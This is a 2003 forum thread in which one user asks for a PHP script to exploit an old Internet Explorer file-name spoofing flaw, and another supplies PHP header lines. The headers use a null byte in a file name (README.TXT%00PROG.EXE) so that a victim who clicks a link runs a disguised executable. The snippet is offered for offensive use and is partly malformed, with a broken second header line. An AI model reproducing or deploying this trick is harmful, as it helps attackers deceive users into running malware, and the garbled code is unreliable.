mojo
Aug 13 2003, 01:33 PM
This is an older spoof...
http://www.securiteam.com/windowsntfocus/5...5DP0D1F61A.htmlIt works on all non SP1 machines.
My friend had coded a PHP script that would do this, but I lost it. Anyone out there do this? It was only about 5 lines of code.
virus
Aug 13 2003, 03:49 PM
Yeh this is quite an old exploit. What happens is that the malicious web-server names a file to include a null byte, which is something like README.TXT%00PROG.EXE
So if u want to execute the program using php, then u have to add the following line at the top of your php file to exploit MSIE 6
| CODE |
header("Content-Disposition: inline; filename=README.TXT%00PROG.EXE");
header("meta http-equiv:Content-Type; content=text/css">
|
In this way as soon as the user clicks the link, he will actually execute the malicious file. So .. the problem is with the null byte that is added to the file name and the .exe extension is not visible on the vulnerable MSIE browser.
